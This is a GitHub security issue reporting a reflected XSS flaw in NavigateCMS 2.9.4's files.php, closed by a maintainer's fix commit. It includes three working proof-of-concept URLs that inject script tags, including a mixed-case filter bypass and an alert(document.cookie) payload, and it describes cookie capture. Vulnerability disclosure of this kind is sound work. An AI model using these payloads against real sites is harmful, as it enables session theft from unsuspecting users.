### ISSUE TITLE
[Security Bug] XSS in \lib\packages\files\files.php in NavigateCMS 2.9.4 r1561

### ISSUE THREAD

**Issue by faisalfs10x** [NavigateCMS/Navigate-CMS#30]
**Vulnerability Name:** XSS

**Product version:** NavigateCMS 2.9.4 r1561

**Vulnerability Description:** XSS to capture the cookies of anyone that navigates to the vulnerable URL

**Vulnerable URL:** 
`1) http://localhost/navigate2.9.4/navigate/navigate.php?fid=files&act=edit&op=replace_file&id=%3Cscript%3Ealert(%22xss-1%22)%3C/script%3E`
`2) http://localhost/navigate2.9.4/navigate/navigate.php?fid=files&act=edit&id=%3Cscript%3Ealert(document.cookie)%3C/script%3E`
`3) http://localhost/navigate2.9.4/navigate/navigate.php?fid=files&act=edit&op=replace_file&id=%3CsCriPt%3Ealert(%22XSS-1%22)%3C/sCriPt%3E&tab=%3CsCriPt%3Ealert(%22XSS-2%22)%3C/sCriPt%3E`

![image](https://user-images.githubusercontent.com/51811615/150855428-f1869a29-004e-4511-a4a2-269be8f8d536.png)

**Affected Source code**: \lib\packages\files\files.php
![image](https://user-images.githubusercontent.com/51811615/150853641-60a8bdf3-3abb-49c2-a121-bd60d8f3594e.png)

**Comment by NavigateCMS** [comment]
Fixed by #f9af8cbf4831599c9092a22f9f931cf1db8c3876
